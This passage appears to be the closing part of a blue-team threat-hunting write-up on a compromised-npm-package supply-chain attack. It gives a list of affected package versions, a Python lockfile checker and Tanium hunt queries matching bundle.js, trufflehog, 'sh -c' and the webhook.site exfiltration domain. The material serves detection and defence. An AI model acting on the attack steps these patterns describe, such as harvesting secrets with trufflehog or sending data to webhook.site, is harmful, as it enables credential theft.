    "@ctrl/ngx-emoji-mart@9.2.2",
    "@ctrl/ngx-rightclick@4.0.1",
    "@ctrl/ngx-rightclick@4.0.2",
    "@ctrl/qbittorrent@9.7.1",
    "@ctrl/qbittorrent@9.7.2",
    "@ctrl/react-adsense@2.0.1",
    "@ctrl/react-adsense@2.0.2",
    "@ctrl/shared-torrent@6.3.1",
    "@ctrl/shared-torrent@6.3.2",
    "@ctrl/tinycolor@4.1.1",
    "@ctrl/tinycolor@4.1.2",
    "@ctrl/torrent-file@4.1.1",
    "@ctrl/torrent-file@4.1.2",
    "@ctrl/transmission@7.3.1",
    "@ctrl/ts-base32@4.0.1",
    "@ctrl/ts-base32@4.0.2",
    "@hestjs/core@0.2.1",
    "@hestjs/cqrs@0.1.6",
    "@hestjs/demo@0.1.2",
    "@hestjs/eslint-config@0.1.2",
    "@hestjs/logger@0.1.6",
    "@hestjs/scalar@0.1.7",
    "@hestjs/validation@0.1.6",
    "@nativescript-community/arraybuffers@1.1.6",
    "@nativescript-community/arraybuffers@1.1.7",
    "@nativescript-community/arraybuffers@1.1.8",
    "@nativescript-community/gesturehandler@2.0.35",
    "@nativescript-community/perms@3.0.5",
    "@nativescript-community/perms@3.0.6",
    "@nativescript-community/perms@3.0.7",
    "@nativescript-community/perms@3.0.8",
    "@nativescript-community/sqlite@3.5.2",
    "@nativescript-community/sqlite@3.5.3",
    "@nativescript-community/sqlite@3.5.4",
    "@nativescript-community/sqlite@3.5.5",
    "@nativescript-community/text@1.6.9",
    "@nativescript-community/text@1.6.10",
    "@nativescript-community/text@1.6.11",
    "@nativescript-community/text@1.6.12",
    "@nativescript-community/typeorm@0.2.30",
    "@nativescript-community/typeorm@0.2.31",
    "@nativescript-community/typeorm@0.2.32",
    "@nativescript-community/typeorm@0.2.33",
    "@nativescript-community/ui-collectionview@6.0.6",
    "@nativescript-community/ui-document-picker@1.1.27",
    "@nativescript-community/ui-document-picker@1.1.28",
    "@nativescript-community/ui-drawer@0.1.30",
    "@nativescript-community/ui-image@4.5.6",
    "@nativescript-community/ui-label@1.3.35",
    "@nativescript-community/ui-label@1.3.36",
    "@nativescript-community/ui-label@1.3.37",
    "@nativescript-community/ui-material-bottom-navigation@7.2.72",
    "@nativescript-community/ui-material-bottom-navigation@7.2.73",
    "@nativescript-community/ui-material-bottom-navigation@7.2.74",
    "@nativescript-community/ui-material-bottom-navigation@7.2.75",
    "@nativescript-community/ui-material-bottomsheet@7.2.72",
    "@nativescript-community/ui-material-core@7.2.72",
    "@nativescript-community/ui-material-core@7.2.73",
    "@nativescript-community/ui-material-core@7.2.74",
    "@nativescript-community/ui-material-core@7.2.75",
    "@nativescript-community/ui-material-core-tabs@7.2.72",
    "@nativescript-community/ui-material-core-tabs@7.2.73",
    "@nativescript-community/ui-material-core-tabs@7.2.74",
    "@nativescript-community/ui-material-core-tabs@7.2.75",
    "@nativescript-community/ui-material-ripple@7.2.72",
    "@nativescript-community/ui-material-ripple@7.2.73",
    "@nativescript-community/ui-material-ripple@7.2.74",
    "@nativescript-community/ui-material-ripple@7.2.75",
    "@nativescript-community/ui-material-tabs@7.2.72",
    "@nativescript-community/ui-material-tabs@7.2.73",
    "@nativescript-community/ui-material-tabs@7.2.74",
    "@nativescript-community/ui-material-tabs@7.2.75",
    "@nativescript-community/ui-pager@14.1.36",
    "@nativescript-community/ui-pager@14.1.37",
    "@nativescript-community/ui-pager@14.1.38",
    "@nativescript-community/ui-pulltorefresh@2.5.4",
    "@nativescript-community/ui-pulltorefresh@2.5.5",
    "@nativescript-community/ui-pulltorefresh@2.5.6",
    "@nativescript-community/ui-pulltorefresh@2.5.7",
    "@nexe/config-manager@0.1.1",
    "@nexe/eslint-config@0.1.1",
    "@nexe/logger@0.1.3",
    "@nstudio/angular@20.0.4",
    "@nstudio/angular@20.0.5",
    "@nstudio/angular@20.0.6",
    "@nstudio/focus@20.0.4",
    "@nstudio/focus@20.0.5",
    "@nstudio/focus@20.0.6",
    "@nstudio/nativescript-checkbox@2.0.6",
    "@nstudio/nativescript-checkbox@2.0.7",
    "@nstudio/nativescript-checkbox@2.0.8",
    "@nstudio/nativescript-checkbox@2.0.9",
    "@nstudio/nativescript-loading-indicator@5.0.1",
    "@nstudio/nativescript-loading-indicator@5.0.2",
    "@nstudio/nativescript-loading-indicator@5.0.3",
    "@nstudio/nativescript-loading-indicator@5.0.4",
    "@nstudio/ui-collectionview@5.1.11",
    "@nstudio/ui-collectionview@5.1.12",
    "@nstudio/ui-collectionview@5.1.13",
    "@nstudio/ui-collectionview@5.1.14",
    "@nstudio/web@20.0.4",
    "@nstudio/web-angular@20.0.4",
    "@nstudio/xplat@20.0.5",
    "@nstudio/xplat@20.0.6",
    "@nstudio/xplat@20.0.7",
    "@nstudio/xplat-utils@20.0.5",
    "@nstudio/xplat-utils@20.0.6",
    "@nstudio/xplat-utils@20.0.7",
    "@operato/board@9.0.36",
    "@operato/board@9.0.37",
    "@operato/board@9.0.38",
    "@operato/board@9.0.39",
    "@operato/board@9.0.40",
    "@operato/board@9.0.41",
    "@operato/board@9.0.42",
    "@operato/board@9.0.43",
    "@operato/board@9.0.44",
    "@operato/board@9.0.45",
    "@operato/board@9.0.46",
    "@operato/data-grist@9.0.29",
    "@operato/data-grist@9.0.35",
    "@operato/data-grist@9.0.36",
    "@operato/data-grist@9.0.37",
    "@operato/graphql@9.0.22",
    "@operato/graphql@9.0.35",
    "@operato/graphql@9.0.36",
    "@operato/graphql@9.0.37",
    "@operato/graphql@9.0.38",
    "@operato/graphql@9.0.39",
    "@operato/graphql@9.0.40",
    "@operato/graphql@9.0.41",
    "@operato/graphql@9.0.42",
    "@operato/graphql@9.0.43",
    "@operato/graphql@9.0.44",
    "@operato/graphql@9.0.45",
    "@operato/graphql@9.0.46",
    "@operato/headroom@9.0.2",
    "@operato/headroom@9.0.35",
    "@operato/headroom@9.0.36",
    "@operato/headroom@9.0.37",
    "@operato/help@9.0.35",
    "@operato/help@9.0.36",
    "@operato/help@9.0.37",
    "@operato/help@9.0.38",
    "@operato/help@9.0.39",
    "@operato/help@9.0.40",
    "@operato/help@9.0.41",
    "@operato/help@9.0.42",
    "@operato/help@9.0.43",
    "@operato/help@9.0.44",
    "@operato/help@9.0.45",
    "@operato/help@9.0.46",
    "@operato/i18n@9.0.35",
    "@operato/i18n@9.0.36",
    "@operato/i18n@9.0.37",
    "@operato/input@9.0.27",
    "@operato/input@9.0.35",
    "@operato/input@9.0.36",
    "@operato/input@9.0.37",
    "@operato/input@9.0.38",
    "@operato/input@9.0.39",
    "@operato/input@9.0.40",
    "@operato/input@9.0.41",
    "@operato/input@9.0.42",
    "@operato/input@9.0.43",
    "@operato/input@9.0.44",
    "@operato/input@9.0.45",
    "@operato/input@9.0.46",
    "@operato/layout@9.0.35",
    "@operato/layout@9.0.36",
    "@operato/layout@9.0.37",
    "@operato/popup@9.0.22",
    "@operato/popup@9.0.35",
    "@operato/popup@9.0.36",
    "@operato/popup@9.0.37",
    "@operato/popup@9.0.38",
    "@operato/popup@9.0.39",
    "@operato/popup@9.0.40",
    "@operato/popup@9.0.41",
    "@operato/popup@9.0.42",
    "@operato/popup@9.0.43",
    "@operato/popup@9.0.44",
    "@operato/popup@9.0.45",
    "@operato/popup@9.0.46",
    "@operato/pull-to-refresh@9.0.36",
    "@operato/pull-to-refresh@9.0.37",
    "@operato/pull-to-refresh@9.0.38",
    "@operato/pull-to-refresh@9.0.39",
    "@operato/pull-to-refresh@9.0.40",
    "@operato/pull-to-refresh@9.0.41",
    "@operato/pull-to-refresh@9.0.42",
    "@operato/shell@9.0.22",
    "@operato/shell@9.0.35",
    "@operato/shell@9.0.36",
    "@operato/shell@9.0.37",
    "@operato/shell@9.0.38",
    "@operato/shell@9.0.39",
    "@operato/styles@9.0.2",
    "@operato/styles@9.0.35",
    "@operato/styles@9.0.36",
    "@operato/styles@9.0.37",
    "@operato/utils@9.0.22",
    "@operato/utils@9.0.35",
    "@operato/utils@9.0.36",
    "@operato/utils@9.0.37",
    "@operato/utils@9.0.38",
    "@operato/utils@9.0.39",
    "@operato/utils@9.0.40",
    "@operato/utils@9.0.41",
    "@operato/utils@9.0.42",
    "@operato/utils@9.0.43",
    "@operato/utils@9.0.44",
    "@operato/utils@9.0.45",
    "@operato/utils@9.0.46",
    "@teselagen/bounce-loader@0.3.16",
    "@teselagen/bounce-loader@0.3.17",
    "@teselagen/liquibase-tools@0.4.1",
    "@teselagen/range-utils@0.3.14",
    "@teselagen/range-utils@0.3.15",
    "@teselagen/react-list@0.8.19",
    "@teselagen/react-list@0.8.20",
    "@teselagen/react-table@6.10.19",
    "@thangved/callback-window@1.1.4",
    "@things-factory/attachment-base@9.0.43",
    "@things-factory/attachment-base@9.0.44",
    "@things-factory/attachment-base@9.0.45",
    "@things-factory/attachment-base@9.0.46",
    "@things-factory/attachment-base@9.0.47",
    "@things-factory/attachment-base@9.0.48",
    "@things-factory/attachment-base@9.0.49",
    "@things-factory/attachment-base@9.0.50",
    "@things-factory/auth-base@9.0.43",
    "@things-factory/auth-base@9.0.44",
    "@things-factory/auth-base@9.0.45",
    "@things-factory/email-base@9.0.42",
    "@things-factory/email-base@9.0.43",
    "@things-factory/email-base@9.0.44",
    "@things-factory/email-base@9.0.45",
    "@things-factory/email-base@9.0.46",
    "@things-factory/email-base@9.0.47",
    "@things-factory/email-base@9.0.48",
    "@things-factory/email-base@9.0.49",
    "@things-factory/email-base@9.0.50",
    "@things-factory/email-base@9.0.51",
    "@things-factory/email-base@9.0.52",
    "@things-factory/email-base@9.0.53",
    "@things-factory/email-base@9.0.54",
    "@things-factory/env@9.0.42",
    "@things-factory/env@9.0.43",
    "@things-factory/env@9.0.44",
    "@things-factory/env@9.0.45",
    "@things-factory/integration-base@9.0.43",
    "@things-factory/integration-base@9.0.44",
    "@things-factory/integration-base@9.0.45",
    "@things-factory/integration-marketplace@9.0.43",
    "@things-factory/integration-marketplace@9.0.44",
    "@things-factory/integration-marketplace@9.0.45",
    "@things-factory/shell@9.0.43",
    "@things-factory/shell@9.0.44",
    "@things-factory/shell@9.0.45",
    "@tnf-dev/api@1.0.8",
    "@tnf-dev/core@1.0.8",
    "@tnf-dev/js@1.0.8",
    "@tnf-dev/mui@1.0.8",
    "@tnf-dev/react@1.0.8",
    "@ui-ux-gang/devextreme-angular-rpk@24.1.7",
    "@yoobic/design-system@6.5.17",
    "@yoobic/jpeg-camera-es6@1.0.13",
    "@yoobic/yobi@8.7.53",
    "airchief@0.3.1",
    "airpilot@0.8.8",
    "angulartics2@14.1.1",
    "angulartics2@14.1.2",
    "browser-webdriver-downloader@3.0.8",
    "capacitor-notificationhandler@0.0.2",
    "capacitor-notificationhandler@0.0.3",
    "capacitor-plugin-healthapp@0.0.2",
    "capacitor-plugin-healthapp@0.0.3",
    "capacitor-plugin-ihealth@1.1.8",
    "capacitor-plugin-ihealth@1.1.9",
    "capacitor-plugin-vonage@1.0.2",
    "capacitor-plugin-vonage@1.0.3",
    "capacitorandroidpermissions@0.0.4",
    "capacitorandroidpermissions@0.0.5",
    "config-cordova@0.8.5",
    "cordova-plugin-voxeet2@1.0.24",
    "cordova-voxeet@1.0.32",
    "create-hest-app@0.1.9",
    "db-evo@1.1.4",
    "db-evo@1.1.5",
    "devextreme-angular-rpk@21.2.8",
    "ember-browser-services@5.0.2",
    "ember-browser-services@5.0.3",
    "ember-headless-form@1.1.2",
    "ember-headless-form@1.1.3",
    "ember-headless-form-yup@1.0.1",
    "ember-headless-table@2.1.5",
    "ember-headless-table@2.1.6",
    "ember-url-hash-polyfill@1.0.12",
    "ember-url-hash-polyfill@1.0.13",
    "ember-velcro@2.2.1",
    "ember-velcro@2.2.2",
    "encounter-playground@0.0.2",
    "encounter-playground@0.0.3",
    "encounter-playground@0.0.4",
    "encounter-playground@0.0.5",
    "eslint-config-crowdstrike@11.0.2",
    "eslint-config-crowdstrike@11.0.3",
    "eslint-config-crowdstrike-node@4.0.3",
    "eslint-config-crowdstrike-node@4.0.4",
    "eslint-config-teselagen@6.1.7",
    "globalize-rpk@1.7.4",
    "graphql-sequelize-teselagen@5.3.8",
    "html-to-base64-image@1.0.2",
    "json-rules-engine-simplified@0.2.1",
    "jumpgate@0.0.2",
    "koa2-swagger-ui@5.11.1",
    "koa2-swagger-ui@5.11.2",
    "mcfly-semantic-release@1.3.1",
    "mcp-knowledge-base@0.0.2",
    "mcp-knowledge-graph@1.2.1",
    "mobioffice-cli@1.0.3",
    "monorepo-next@13.0.1",
    "monorepo-next@13.0.2",
    "mstate-angular@0.4.4",
    "mstate-cli@0.4.7",
    "mstate-dev-react@1.1.1",
    "mstate-react@1.6.5",
    "ng2-file-upload@7.0.2",
    "ng2-file-upload@7.0.3",
    "ng2-file-upload@8.0.1",
    "ng2-file-upload@8.0.2",
    "ng2-file-upload@8.0.3",
    "ng2-file-upload@9.0.1",
    "ngx-bootstrap@18.1.4",
    "ngx-bootstrap@19.0.3",
    "ngx-bootstrap@19.0.4",
    "ngx-bootstrap@20.0.3",
    "ngx-bootstrap@20.0.4",
    "ngx-bootstrap@20.0.5",
    "ngx-color@10.0.1",
    "ngx-color@10.0.2",
    "ngx-toastr@19.0.1",
    "ngx-toastr@19.0.2",
    "ngx-trend@8.0.1",
    "ngx-ws@1.1.5",
    "ngx-ws@1.1.6",
    "oradm-to-gql@35.0.14",
    "oradm-to-gql@35.0.15",
    "oradm-to-sqlz@1.1.2",
    "ove-auto-annotate@0.0.9",
    "pm2-gelf-json@1.0.4",
    "pm2-gelf-json@1.0.5",
    "printjs-rpk@1.6.1",
    "react-complaint-image@0.0.32",
    "react-jsonschema-form-conditionals@0.3.18",
    "remark-preset-lint-crowdstrike@4.0.1",
    "remark-preset-lint-crowdstrike@4.0.2",
    "rxnt-authentication@0.0.3",
    "rxnt-authentication@0.0.4",
    "rxnt-authentication@0.0.5",
    "rxnt-authentication@0.0.6",
    "rxnt-healthchecks-nestjs@1.0.2",
    "rxnt-healthchecks-nestjs@1.0.3",
    "rxnt-healthchecks-nestjs@1.0.4",
    "rxnt-healthchecks-nestjs@1.0.5",
    "rxnt-kue@1.0.4",
    "rxnt-kue@1.0.5",
    "rxnt-kue@1.0.6",
    "rxnt-kue@1.0.7",
    "swc-plugin-component-annotate@1.9.1",
    "swc-plugin-component-annotate@1.9.2",
    "tbssnch@1.0.2",
    "teselagen-interval-tree@1.1.2",
    "tg-client-query-builder@2.14.4",
    "tg-client-query-builder@2.14.5",
    "tg-redbird@1.3.1",
    "tg-seq-gen@1.0.9",
    "tg-seq-gen@1.0.10",
    "thangved-react-grid@1.0.3",
    "ts-gaussian@3.0.5",
    "ts-gaussian@3.0.6",
    "ts-imports@1.0.1",
    "ts-imports@1.0.2",
    "tvi-cli@0.1.5",
    "ve-bamreader@0.2.6",
    "ve-editor@1.0.1",
    "verror-extra@6.0.1",
    "voip-callkit@1.0.2",
    "voip-callkit@1.0.3",
    "wdio-web-reporter@0.1.3",
    "yargs-help-output@5.0.3",
    "yoo-styles@6.0.326",
    "ansi-styles@6.2.2", 
    "debug@4.4.2", 
    "chalk@5.6.1", 
    "supports-color@10.2.1",
    "strip-ansi@7.1.1",
    "ansi-regex@6.2.1", 
    "wrap-ansi@9.0.1", 
    "color-convert@3.1.1",
    "color-name@2.0.1", 
    "is-arrayish@0.3.3", 
    "slice-ansi@7.1.1", 
    "color@5.0.1",
    "color-string@2.1.1", 
    "simple-swizzle@0.2.3", 
    "supports-hyperlinks@4.1.1",
    "has-ansi@6.0.1", 
    "chalk-template@1.1.1", 
    "backslash@0.2.1", 
    "error-ex@1.3.3"
)




```
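The package list above is in `name@version` form, which is the shape of a lockfile entry rather than of a file path, so the place it applies cleanly is a repository's `package-lock.json`. The script below is an added example, not part of the original page or of any vendor tooling: it walks both lockfile layouts (the v1 nested `dependencies` tree and the v2/v3 flat `packages` map) and reports every installed `name@version` that is on the list, including versions nested under another dependency where a top-level pin gives no protection. The two lockfiles embedded in the script are constructed for the demonstration, and `COMPROMISED` holds only a handful of entries from the list above; load the full list for real use.

```python
import json
from typing import Dict, Iterator, List, Set, Tuple

# Subset of the compromised name@version pairs from the hunt list above; extend with the full list for real use.
COMPROMISED: Set[str] = {
    "@ctrl/tinycolor@4.1.1",
    "@ctrl/tinycolor@4.1.2",
    "chalk@5.6.1",
    "debug@4.4.2",
    "ngx-bootstrap@20.0.5",
    "error-ex@1.3.3",
}


def _name_from_lock_path(path: str) -> str:
    """Map a v2/v3 lockfile key such as 'node_modules/a/node_modules/@s/b' to the package name '@s/b'."""
    marker = "node_modules/"
    idx = path.rfind(marker)
    return path[idx + len(marker):] if idx != -1 else path


def iter_installed(lock: Dict) -> Iterator[Tuple[str, str, str]]:
    """Yield (name, version, lockfile_path) for every package recorded in the lockfile.

    lockfileVersion 2/3 keeps a flat 'packages' map keyed by install path (key "" is the root project);
    lockfileVersion 1 keeps a nested 'dependencies' tree, so it is walked recursively.
    """
    packages = lock.get("packages")
    if isinstance(packages, dict):
        for path, meta in packages.items():
            if path == "" or not isinstance(meta, dict):
                continue
            version = meta.get("version")
            if version:
                yield _name_from_lock_path(path), version, path
        return

    def walk(deps: Dict, prefix: str) -> Iterator[Tuple[str, str, str]]:
        for name, meta in deps.items():
            if not isinstance(meta, dict):
                continue
            path = f"{prefix}node_modules/{name}"
            version = meta.get("version")
            if version:
                yield name, version, path
            nested = meta.get("dependencies")
            if isinstance(nested, dict):
                yield from walk(nested, path + "/")

    yield from walk(lock.get("dependencies", {}), "")


def find_compromised(lock: Dict, iocs: Set[str] = COMPROMISED) -> List[Dict[str, str]]:
    """Return every installed package whose name@version is on the IoC list, sorted by lockfile path."""
    hits = []
    for name, version, path in iter_installed(lock):
        key = f"{name}@{version}"
        if key in iocs:
            hits.append({"package": key, "path": path})
    return sorted(hits, key=lambda h: h["path"])


# Constructed sample lockfiles (not real project data). The v3 file has one hoisted hit and one hit
# nested under another dependency; the v1 file has one top-level hit and one nested hit.
SAMPLE_LOCK_V3 = json.loads("""
{
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app", "version": "1.0.0"},
    "node_modules/chalk": {"version": "5.6.1"},
    "node_modules/debug": {"version": "4.3.7"},
    "node_modules/some-lib": {"version": "2.0.0"},
    "node_modules/some-lib/node_modules/@ctrl/tinycolor": {"version": "4.1.2"}
  }
}
""")

SAMPLE_LOCK_V1 = json.loads("""
{
  "lockfileVersion": 1,
  "dependencies": {
    "ngx-bootstrap": {"version": "20.0.5"},
    "parse-json": {
      "version": "5.2.0",
      "dependencies": {"error-ex": {"version": "1.3.3"}}
    }
  }
}
""")

if __name__ == "__main__":
    for label, lock in (("v3", SAMPLE_LOCK_V3), ("v1", SAMPLE_LOCK_V1)):
        for hit in find_compromised(lock):
            print(f"[{label}] {hit['package']} at {hit['path']}")
```

Against a real repository, replace the embedded samples with `json.load(open("package-lock.json"))`; the nested `@ctrl/tinycolor@4.1.2` under `some-lib` shows why the walk must not stop at the top level, and `debug@4.3.7` shows that only the exact compromised versions, not the package name, should raise a finding.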

### 6.5) Hunting Queries Tanium EDR

```cpp
###HUNT06 - Description: Detect malicious bundle.js file, trufflehog
###The second sensor parameter is the time window as epoch milliseconds (start|end); the values below cover a one-hour window on 2025-09-19 (UTC) and must be adjusted to the hunt period
Get Trace Executed Processes[unlimited,1758288047852|1758291646852,0,0,99,0,"","",".*(trufflehog).*","","",""] from all machines
Get Trace Executed Processes[unlimited,1758288047852|1758291646852,0,0,99,0,"","",".*(bundle\.js).*","","",""] from all machines
Get Trace Executed Processes[unlimited,1758288047852|1758291646852,0,0,99,0,"","",".*(bundle\.js|trufflehog|tinycolor|node_modules|chmod|sh -c).*","","",""] from all machines





###HUNT03 - MAL-Domain01-Hunting - Webhook Site
#######// Description: DNS queries for the webhook.site exfiltration domain from Tanium Trace; the epoch-millisecond window (start|end) must be adjusted to the hunt period.
Get Trace DNS Queries[unlimited,1758287446087|1758291045087,1,0,100,0,"","",".*(webhook\.site).*","",""] from all machines


```

## 7.) Conclusion and Learning for a Hunter Blue

* The NPM incident shows that supply chain attacks are increasing in frequency. It is more important than ever to monitor third-party packages for malicious activity, and since malicious code can be hidden in many different ways, runtime threat detection is critical to catching these attacks.
* During hunting or initial triage it is definitely necessary to check how the malware was staged (here: the bundle.js payload, the dropped trufflehog binary and the workflow file).
* -> This showcases how fruitful Compromise Assessment Hunting and **Time Line Analysis can be and should be used in such cases -> it is essential.**


